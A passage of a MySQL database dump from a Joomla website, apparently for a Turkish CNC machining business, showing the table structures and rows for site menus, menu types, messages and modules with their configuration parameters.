',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',334,335,0,'*',0),(665,'solmenu-video-cnc','Akrilik Oyma / Acrylic Engraving','akrilik-oyma-acrylic-engraving','','akrilik-işleme-acrylic-processing/akrilik-oyma-acrylic-engraving','index.php?option=com_content&view=article&id=97','component',1,661,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',336,337,0,'*',0),(666,'solmenu-video-cnc','Aluminyum işleme / Aluminum processing','aluminyum-işleme-aluminum-processing','','aluminyum-işleme-aluminum-processing/aluminyum-işleme-aluminum-processing','index.php?option=com_content&view=article&id=98','component',1,662,2,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',340,341,0,'*',0),(667,'solmenu-video-cnc','Ahşap İşleme / Wood processing (120cm)','ahşap-işleme-wood-processing-120cm','','ahşap-işleme-wood-processing-120cm','index.php?option=com_content&view=article&id=99','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',343,344,0,'*',0),(738,'main','COM_ADMINTOOLS','com_admintools','','com_admintools','index.php?option=com_admintools','component',1,1,1,10149,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',389,390,0,'',1),(721,'main','COM_JCE_MENU_PROFILES','com_jce_menu_profiles','','com_jce/com_jce_menu_profiles','index.php?option=com_jce&view=profiles','component',1,718,2,10044,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',354,355,0,'',1),(720,'main','COM_JCE_MENU_CONFIG','com_jce_menu_config','','com_jce/com_jce_menu_config','index.php?option=com_jce&view=config','component',1,718,2,10044,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',352,353,0,'',1),(719,'main','COM_JCE_MENU_CPANEL','com_jce_menu_cpanel','','com_jce/com_jce_menu_cpanel','index.php?option=com_jce','component',1,718,2,10044,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',350,351,0,'',1),(718,'main','COM_JCE','com_jce','','com_jce','index.php?option=com_jce&view=cpanel','component',1,1,1,10044,0,'0000-00-00 00:00:00',0,1,'components/com_jce/media/img/menu/logo.png',0,'{}',349,358,0,'',1);
/*!40000 ALTER TABLE `fz6t4_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_menu_types`
--

DROP TABLE IF EXISTS `fz6t4_menu_types`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_menu_types` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0',
  `menutype` varchar(24) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` varchar(48) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_menu_types`
--

LOCK TABLES `fz6t4_menu_types` WRITE;
/*!40000 ALTER TABLE `fz6t4_menu_types` DISABLE KEYS */;
INSERT INTO `fz6t4_menu_types` VALUES (2,0,'usermenu','User Menu','A Menu for logged-in Users',0),(3,0,'top','Top','Links for major types of users',0),(4,0,'aboutjoomla','About Joomla','All about Joomla!',0),(6,0,'mainmenu-degil','Main Menu','Simple Home Menu',0),(8,0,'mainmenu-tr','Menu for Turkish Language','',0),(9,0,'mainmenu-en','Menu for English Language','',0),(10,0,'topmenu-tr','Üst Menu-TR','',0),(11,0,'topmenu-en','Üst Menu-EN','',0),(12,0,'solmenu-teknik','Teknik Bilgiler-TR','',0),(13,0,'teknikbilgiler-en','Teknik Bilgiler-EN','',0),(14,0,'mainmenu','Main Menu-Real','',0),(15,221,'solmenu-video-cnc','CNC Videolar-TR','',0);
/*!40000 ALTER TABLE `fz6t4_menu_types` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_messages`
--

DROP TABLE IF EXISTS `fz6t4_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_messages` (
  `message_id` int unsigned NOT NULL AUTO_INCREMENT,
  `user_id_from` int unsigned NOT NULL DEFAULT '0',
  `user_id_to` int unsigned NOT NULL DEFAULT '0',
  `folder_id` tinyint unsigned NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `priority` tinyint unsigned NOT NULL DEFAULT '0',
  `subject` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`message_id`),
  KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_messages`
--

LOCK TABLES `fz6t4_messages` WRITE;
/*!40000 ALTER TABLE `fz6t4_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_messages_cfg`
--

DROP TABLE IF EXISTS `fz6t4_messages_cfg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_messages_cfg` (
  `user_id` int unsigned NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `cfg_value` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_messages_cfg`
--

LOCK TABLES `fz6t4_messages_cfg` WRITE;
/*!40000 ALTER TABLE `fz6t4_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_modules`
--

DROP TABLE IF EXISTS `fz6t4_modules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_modules` (
  `id` int NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `ordering` int NOT NULL DEFAULT '0',
  `position` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access` int unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint unsigned NOT NULL DEFAULT '1',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint NOT NULL DEFAULT '0',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`),
  KEY `idx_language` (`language`)
) ENGINE=MyISAM AUTO_INCREMENT=109 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_modules`
--

LOCK TABLES `fz6t4_modules` WRITE;
/*!40000 ALTER TABLE `fz6t4_modules` DISABLE KEYS */;
INSERT INTO `fz6t4_modules` VALUES (1,0,'Main Menu','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu-degil\",\"startLevel\":\"0\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,0,'Login Form','','',7,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_login',1,1,'{\"greeting\":\"1\",\"name\":\"0\"}',0,'*'),(17,0,'Breadcrumbs','','',1,'position-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_breadcrumbs',1,1,'{\"moduleclass_sfx\":\"\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showComponent\":\"1\",\"separator\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(79,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(18,0,'Book Store','','',1,'position-10',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_banners',1,0,'{\"target\":\"1\",\"count\":\"1\",\"cid\":\"3\",\"catid\":[\"\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"Books!\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(19,0,'Kullanıcı Profili','','',8,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',2,1,'{\"menutype\":\"usermenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'tr-TR'),(20,0,'Top','','',1,'position-1',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"top\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(23,0,'Teknik Bilgiler','','',4,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"solmenu-teknik\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'tr-TR'),(68,0,'About Parks','','<p>The Parks sample site is designed as a simple site that can be routinely updated from the front end of Joomla!.</p><p>As a site, it is largely focused on a blog which can be updated using the front end article submission.</p><p>New weblinks can also be added through the front end.</p><p>A simple image gallery uses com_content with thumbnails displayed in a blog layout and full size images shown in article layout.</p><p>The Parks site features the language switch module. All of the content and modules are tagged as English (en-GB). If a second language pack is added with sample data this can be filtered using the language switch.</p><p>Parks uses HTML5 which is a major web standard (along with XHTML which is used in other areas of sample data).</p>',2,'position-4',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(67,0,'Extensions','','',2,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"aboutjoomla\",\"startLevel\":\"1\",\"endLevel\":\"6\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"-menu\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(25,0,'Site Map','','',1,'sitemapload',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,0,'{\"menutype\":\"mainmenu-degil\",\"startLevel\":\"2\",\"endLevel\":\"3\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"sitemap\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(26,0,'This Site','','',5,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"mainmenu-degil\",\"startLevel\":\"1\",\"endLevel\":\"1\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(27,0,'Archived Articles','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_archive',1,1,'{\"count\":\"10\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(28,0,'Latest News','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_latest',1,1,'{\"catid\":[\"19\"],\"count\":\"5\",\"show_featured\":\"\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(29,0,'Articles Most Read','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_popular',1,1,'{\"catid\":[\"26\",\"29\"],\"count\":\"5\",\"show_front\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(30,0,'Feed Display','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_feed',1,1,'{\"rssurl\":\"http:\\/\\/community.joomla.org\\/blogs\\/community.feed?type=rss\",\"rssrtl\":\"0\",\"rsstitle\":\"1\",\"rssdesc\":\"1\",\"rssimage\":\"1\",\"rssitems\":\"3\",\"rssitemdesc\":\"1\",\"word_count\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(31,0,'News Flash','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_news',1,1,'{\"catid\":[\"19\"],\"image\":\"0\",\"item_title\":\"0\",\"link_titles\":\"\",\"item_heading\":\"h4\",\"showLastSeparator\":\"1\",\"readmore\":\"1\",\"count\":\"1\",\"ordering\":\"a.publish_up\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(33,0,'Random Image','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_random_image',1,1,'{\"type\":\"jpg\",\"folder\":\"images\\/sampledata\\/parks\\/animals\",\"link\":\"\",\"width\":\"180\",\"height\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(34,0,'Articles Related Items','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_related_items',1,1,'{\"showDate\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"owncache\":\"1\"}',0,'*'),(35,0,'Search','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_search',1,1,'{\"label\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"button_pos\":\"right\",\"imagebutton\":\"\",\"button_text\":\"\",\"opensearch\":\"1\",\"opensearch_title\":\"\",\"set_itemid\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(36,0,'Statistics','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_stats',1,1,'{\"serverinfo\":\"1\",\"siteinfo\":\"1\",\"counter\":\"1\",\"increase\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(37,0,'Syndicate Feeds','','',1,'syndicateload',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_syndicate',1,1,'{\"text\":\"Feed Entries\",\"format\":\"rss\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(38,0,'Users Latest','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_users_latest',1,1,'{\"shownumber\":\"5\",\"linknames\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(39,0,'Who\'s Online','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_whosonline',1,1,'{\"showmode\":\"2\",\"linknames\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(40,0,'Wrapper','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_wrapper',1,1,'{\"url\":\"http:\\/\\/www.youtube.com\\/embed\\/vb2eObvmvdI\",\"add\":\"1\",\"scrolling\":\"auto\",\"width\":\"640\",\"height\":\"390\",\"height_auto\":\"1\",\"target\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(41,0,'Footer','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_footer',1,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(44,0,'Login','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_login',1,1,'{\"pretext\":\"\",\"posttext\":\"\",\"login\":\"280\",\"logout\":\"280\",\"greeting\":\"1\",\"name\":\"0\",\"usesecure\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',0,'*'),(45,0,'Menu Example','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"mainmenu-degil\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(47,0,'Latest Park Blogs','','',6,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_latest',1,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"user_id\":\"0\",\"show_front\":\"1\",\"catid\":\"35\",\"layout\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\"}',0,'en-GB'),(48,0,'Custom HTML','','<p>This is a custom html module. That means you can enter whatever content you want.</p>',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,1,'{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(49,0,'Weblinks','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_weblinks',1,1,'{\"catid\":\"32\",\"count\":\"5\",\"ordering\":\"title\",\"direction\":\"asc\",\"target\":\"3\",\"description\":\"0\",\"hits\":\"0\",\"count_clicks\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}',0,'*'),(52,0,'Breadcrumbs','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_breadcrumbs',1,1,'{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(61,0,'Articles Categories','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_articles_categories',1,1,'{\"parent\":\"29\",\"show_description\":\"0\",\"show_children\":\"0\",\"count\":\"0\",\"maxlevel\":\"0\",\"layout\":\"_:default\",\"item_heading\":\"4\",\"moduleclass_sfx\":\"\",\"owncache\":\"1\",\"cache_time\":\"900\"}',0,'*'),(56,0,'Banners','','',1,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 